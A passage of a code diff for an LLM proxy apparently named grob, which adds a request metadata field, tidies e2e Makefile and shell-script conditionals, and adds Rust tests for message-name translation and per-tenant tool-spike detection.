     pub max_output_tokens: Option<u32>,
+    /// Arbitrary request metadata, including internal routing hints.
+    #[serde(default)]
+    pub metadata: Option<HashMap<String, Value>>,
 
     // ── Ignored gracefully (accepted but not processed) ──
     /// Reference to a previous response for multi-turn (ignored by grob).

--- a/tests/e2e/CLAUDE.md
+++ b/tests/e2e/CLAUDE.md
@@ -51,6 +51,15 @@ GROB_SIEGE_GEMINI_KEY      real Gemini API key
 Live tests live under `tests/live/` and are skipped unless the corresponding
 variable is set.
 
+## Release Policy
+
+- The mock-backed Hurl suites are the CI/release gate. They run without live
+  provider credentials and must stay deterministic.
+- Load tests under `load/` are manual or separately scheduled capacity checks;
+  they do not block releases unless CI explicitly promotes them.
+- Live-provider tests are env-gated and informational by default. Missing keys
+  must skip, not fail, so release health is not coupled to external accounts.
+
 ## Quick Start
 
 ```bash

--- a/tests/e2e/Makefile
+++ b/tests/e2e/Makefile
@@ -65,20 +65,28 @@ all: up wait-jwks init-proxies test down
 .PHONY: images
 images:
 	@echo "=== Building images ==="
-	@podman image exists localhost/grob:e2e 2>/dev/null || \
-		(echo "  pulling grob..." && podman pull ghcr.io/azerozero/grob:latest && \
-		 podman tag ghcr.io/azerozero/grob:latest localhost/grob:e2e)
-	@podman image exists localhost/vidaimock:e2e 2>/dev/null || \
-		(echo "  building vidaimock..." && podman build -q -t localhost/vidaimock:e2e $(E2E_DIR)/images/vidaimock)
-	@podman image exists $(RUNNER_IMG) 2>/dev/null || \
-		(echo "  building runner..." && podman build -q -t $(RUNNER_IMG) $(E2E_DIR)/images/runner)
+	@if ! podman image exists localhost/grob:e2e 2>/dev/null; then \
+		echo "  pulling grob..."; \
+		podman pull ghcr.io/azerozero/grob:latest; \
+		podman tag ghcr.io/azerozero/grob:latest localhost/grob:e2e; \
+	fi
+	@if ! podman image exists localhost/vidaimock:e2e 2>/dev/null; then \
+		echo "  building vidaimock..."; \
+		podman build -q -t localhost/vidaimock:e2e $(E2E_DIR)/images/vidaimock; \
+	fi
+	@if ! podman image exists $(RUNNER_IMG) 2>/dev/null; then \
+		echo "  building runner..."; \
+		podman build -q -t $(RUNNER_IMG) $(E2E_DIR)/images/runner; \
+	fi
 	@echo "  images ready"
 
 .PHONY: up
 up: images
 	@echo ""
 	@echo "=== Starting pod ==="
-	@podman pod exists e2e-pod 2>/dev/null && podman pod rm -f e2e-pod >/dev/null 2>&1 || true
+	@if podman pod exists e2e-pod 2>/dev/null; then \
+		podman pod rm -f e2e-pod >/dev/null 2>&1; \
+	fi
 	@rm -rf $(E2E_DIR)/auth/keys $(E2E_DIR)/auth/tokens $(E2E_DIR)/auth/jwks.json $(E2E_DIR)/auth/nginx.conf
 	@mkdir -p /tmp/grob-audit
 	@export E2E_DIR=$(E2E_DIR) && envsubst '$${E2E_DIR}' < $(POD_MANIFEST) | podman play kube - >/dev/null

--- a/tests/e2e/tests/advanced/run-advanced.sh
+++ b/tests/e2e/tests/advanced/run-advanced.sh
@@ -141,9 +141,21 @@ if [ -f "$AUDIT_FILE" ]; then
     has_tokens=$(echo "$line" | python3 -c "import json,sys; e=json.load(sys.stdin); print('yes' if e.get('input_tokens') is not None else 'no')" 2>/dev/null || echo "no")
     has_tenant=$(echo "$line" | python3 -c "import json,sys; e=json.load(sys.stdin); print('yes' if e.get('tenant_id') else 'no')" 2>/dev/null || echo "no")
 
-    [ "$has_model" = "yes" ] && pass "S4a — model_name in audit (Art. 12)" || fail "S4a — missing model_name"
-    [ "$has_tokens" = "yes" ] && pass "S4b — token counts in audit (Art. 12)" || fail "S4b — missing token counts"
-    [ "$has_tenant" = "yes" ] && pass "S4c — tenant_id in audit" || fail "S4c — missing tenant_id"
+    if [ "$has_model" = "yes" ]; then
+        pass "S4a — model_name in audit (Art. 12)"
+    else
+        fail "S4a — missing model_name"
+    fi
+    if [ "$has_tokens" = "yes" ]; then
+        pass "S4b — token counts in audit (Art. 12)"
+    else
+        fail "S4b — missing token counts"
+    fi
+    if [ "$has_tenant" = "yes" ]; then
+        pass "S4c — tenant_id in audit"
+    else
+        fail "S4c — missing tenant_id"
+    fi
 else
     skip "S4 — no audit file"
 fi
@@ -153,7 +165,11 @@ echo ""
 echo "--- S5: HIT Gateway endpoint ---"
 
 if curl -sf "http://127.0.0.1:8102/v1/models" >/dev/null 2>&1; then
-    bash "$(dirname "$0")/S5-hit-flow.sh" && pass "S5" || skip "S5 — HIT flow incomplete"
+    if bash "$(dirname "$0")/S5-hit-flow.sh"; then
+        pass "S5"
+    else
+        skip "S5 — HIT flow incomplete"
+    fi
 else
     skip "S5 — vidaimock-tool (port 8102) not available"
 fi
@@ -168,7 +184,11 @@ scores_status=$(curl -sf -o /dev/null -w '%{http_code}' "http://$HOST/api/scores
 if [ "$scores_status" = "200" ]; then
     has_scores=$(curl -sf "http://$HOST/api/scores" -H "Authorization: Bearer $JWT" 2>/dev/null \
         | python3 -c "import json,sys; d=json.load(sys.stdin); print('yes' if d.get('scores') else 'no')" 2>/dev/null || echo "no")
-    [ "$has_scores" = "yes" ] && pass "S6 — adaptive scores endpoint with data" || pass "S6 — scores endpoint exists"
+    if [ "$has_scores" = "yes" ]; then
+        pass "S6 — adaptive scores endpoint with data"
+    else
+        pass "S6 — scores endpoint exists"
+    fi
 else
     skip "S6 — /api/scores returned $scores_status"
 fi
@@ -177,7 +197,11 @@ fi
 echo ""
 echo "--- S7: Output-side DLP ---"
 if curl -sf "http://127.0.0.1:8101/v1/models" >/dev/null 2>&1; then
-    bash "$(dirname "$0")/S7-output-dlp.sh" && pass "S7" || fail "S7"
+    if bash "$(dirname "$0")/S7-output-dlp.sh"; then
+        pass "S7"
+    else
+        fail "S7"
+    fi
 else
     skip "S7 — vidaimock-url (port 8101) not available"
 fi
@@ -186,7 +210,11 @@ fi
 echo ""
 echo "--- S8: HIT Gateway + tool_use ---"
 if curl -sf "http://127.0.0.1:8102/v1/models" >/dev/null 2>&1; then
-    bash "$(dirname "$0")/S8-hit-gateway.sh" && pass "S8" || fail "S8"
+    if bash "$(dirname "$0")/S8-hit-gateway.sh"; then
+        pass "S8"
+    else
+        fail "S8"
+    fi
 else
     skip "S8 — vidaimock-tool (port 8102) not available"
 fi

--- a/tests/e2e/up.sh
+++ b/tests/e2e/up.sh
@@ -17,12 +17,20 @@ if ! command -v podman &>/dev/null; then
 fi
 echo "→ podman $(podman --version)"
 
-# Ensure podman machine is running (macOS)
-if [[ "$(uname -s)" == "Darwin" ]]; then
-    if ! podman machine inspect podman-machine-default 2>/dev/null | grep -q '"State": "running"'; then
+# Ensure podman is usable before building or launching containers. On macOS
+# this may require starting the default podman machine; if startup fails, keep
+# the real error visible instead of continuing into opaque image/pod failures.
+if ! podman info >/dev/null 2>&1; then
+    if [[ "$(uname -s)" == "Darwin" ]]; then
         echo "→ Starting podman machine…"
-        podman machine start 2>/dev/null || true
+        podman machine start
     fi
+fi
+
+if ! podman info >/dev/null 2>&1; then
+    echo "ERROR: podman is installed but not running or not reachable." >&2
+    echo "Try 'podman machine start' on macOS, then rerun this script." >&2
+    exit 1
 fi
 
 # ---------------------------------------------------------------------------
@@ -66,10 +74,10 @@ echo "→ Starting pod from ${POD_MANIFEST}"
 # Resolve ${E2E_DIR} in the manifest template to absolute path
 export E2E_DIR="${SCRIPT_DIR}"
 RESOLVED_MANIFEST="$(mktemp)"
-envsubst '${E2E_DIR}' < "${POD_MANIFEST}" > "${RESOLVED_MANIFEST}"
+trap 'rm -f "${RESOLVED_MANIFEST}"' EXIT
+envsubst "\${E2E_DIR}" < "${POD_MANIFEST}" > "${RESOLVED_MANIFEST}"
 cd "${SCRIPT_DIR}"
 podman play kube "${RESOLVED_MANIFEST}"
-rm -f "${RESOLVED_MANIFEST}"
 
 # ---------------------------------------------------------------------------
 # 5. Wait for Grob /health

--- a/tests/enterprise/translation_test.rs
+++ b/tests/enterprise/translation_test.rs
@@ -184,6 +184,7 @@ fn anthropic_to_openai_strips_duplicate_system_role_from_messages() {
         stream: None,
         tools: None,
         tool_choice: None,
+        metadata: None,
         response_format: None,
         reasoning_effort: None,
         seed: None,
@@ -595,6 +596,7 @@ fn openai_request_to_canonical_simple_user_message() {
         stream: None,
         tools: None,
         tool_choice: None,
+        metadata: None,
         response_format: None,
         reasoning_effort: None,
         seed: None,
@@ -612,6 +614,70 @@ fn openai_request_to_canonical_simple_user_message() {
     assert_eq!(canonical.max_tokens, 128);
     assert_eq!(canonical.messages.len(), 1);
     assert!(canonical.system.is_none());
+}
+
+#[test]
+fn openai_request_message_names_roundtrip_to_openai_provider() {
+    let req = OpenAIRequest {
+        model: "gpt-4o".to_string(),
+        messages: vec![
+            OpenAIMessage {
+                role: "system".to_string(),
+                content: Some(OpenAIContent::String("Follow policy".to_string())),
+                name: Some("planner".to_string()),
+                tool_calls: None,
+                tool_call_id: None,
+            },
+            OpenAIMessage {
+                role: "user".to_string(),
+                content: Some(OpenAIContent::String("Hello".to_string())),
+                name: Some("alice".to_string()),
+                tool_calls: None,
+                tool_call_id: None,
+            },
+            OpenAIMessage {
+                role: "assistant".to_string(),
+                content: Some(OpenAIContent::String("Hi".to_string())),
+                name: Some("bot".to_string()),
+                tool_calls: None,
+                tool_call_id: None,
+            },
+        ],
+        max_tokens: Some(64),
+        temperature: None,
+        top_p: None,
+        stop: None,
+        stream: None,
+        tools: None,
+        tool_choice: None,
+        metadata: None,
+        response_format: None,
+        reasoning_effort: None,
+        seed: None,
+        frequency_penalty: None,
+        presence_penalty: None,
+        parallel_tool_calls: None,
+        user: None,
+        logprobs: None,
+        top_logprobs: None,
+        service_tier: None,
+    };
+
+    let canonical = transform_openai_to_canonical(req).expect("transform must succeed");
+    assert_eq!(
+        canonical.extensions.openai_system_name.as_deref(),
+        Some("planner")
+    );
+    assert_eq!(
+        canonical.extensions.openai_message_names,
+        vec![Some("alice".to_string()), Some("bot".to_string())]
+    );
+
+    let out = anthropic_to_openai_request(&canonical).expect("provider transform succeeds");
+    let messages = out["messages"].as_array().expect("messages array");
+    assert_eq!(messages[0]["name"], json!("planner"));
+    assert_eq!(messages[1]["name"], json!("alice"));
+    assert_eq!(messages[2]["name"], json!("bot"));
 }
 
 #[test]
@@ -641,6 +707,7 @@ fn openai_request_to_canonical_with_image_url_part() {
         stream: None,
         tools: None,
         tool_choice: None,
+        metadata: None,
         response_format: None,
         reasoning_effort: None,
         seed: None,
@@ -706,6 +773,7 @@ fn openai_request_to_canonical_tool_call_followed_by_tool_result() {
         stream: None,
         tools: None,
         tool_choice: None,
+        metadata: None,
         response_format: None,
         reasoning_effort: None,
         seed: None,
@@ -931,6 +999,7 @@ fn transform_handles_empty_messages_array_gracefully() {
         stream: None,
         tools: None,
         tool_choice: None,
+        metadata: None,
         response_format: None,
         reasoning_effort: None,
         seed: None,

--- a/tests/integration/multi_tenant_isolation_test.rs
+++ b/tests/integration/multi_tenant_isolation_test.rs
@@ -391,14 +391,27 @@ fn tenant_jwt_claim_is_authoritative() {
     assert_ne!(claims.tenant_id(), claims_sub_only.tenant_id());
 }
 
-#[ignore = "TODO: ToolSpikeDetector lands in PR #308 (feat/anomaly-detection-tool-spike) \
-            and is not yet on this branch. Re-enable once the detector is merged \
-            and exposes a per-tenant `record_tool_call` / `is_blocked` API."]
 #[test]
 fn tenant_anomaly_detector_is_per_tenant() {
-    // REGRESSION GUARD: tenant A spiking 600 tool calls/min MUST be blocked
-    // independently of tenant B's traffic (50/min). The detector must key
-    // on `tenant_id`, not on global counters, otherwise one noisy tenant
-    // takes down every other tenant's tool-calling capability.
-    panic!("ToolSpikeDetector not yet present on this branch");
+    // REGRESSION GUARD: tenant A spiking tool calls MUST be blocked
+    // independently of tenant B's traffic. The detector must key on
+    // `tenant_id`, not on global counters, otherwise one noisy tenant takes
+    // down every other tenant's tool-calling capability.
+    use grob::security::tool_spike::{
+        resolve_key, SpikeAction, ToolSpikeConfig, ToolSpikeDetector,
+    };
+
+    let detector = ToolSpikeDetector::new(ToolSpikeConfig {
+        warn_per_min: 5,
+        block_per_min: 10,
+    });
+    let req = shared_request();
+    let tenant_a_key = resolve_key(&req, Some("tenant_a"));
+    let tenant_b_key = resolve_key(&req, Some("tenant_b"));
+
+    assert_eq!(detector.observe(&tenant_a_key, 10), SpikeAction::Block);
+    assert_eq!(detector.current_total(&tenant_a_key), 10);
+    assert_eq!(detector.current_total(&tenant_b_key), 0);
+    assert_eq!(detector.observe(&tenant_b_key, 4), SpikeAction::Allow);
+    assert_eq!(detector.current_total(&tenant_b_key), 4);
 }


### PR DESCRIPTION
Adds a read-only endpoint inventory adapter derived from the legacy routing schema, aligns routing ADRs with delivered behavior, and documents hedge cancellation billing checks. Local gates: cargo fmt --all -- --check, cargo clippy -- -D warnings, cargo nextest run, cargo test --doc.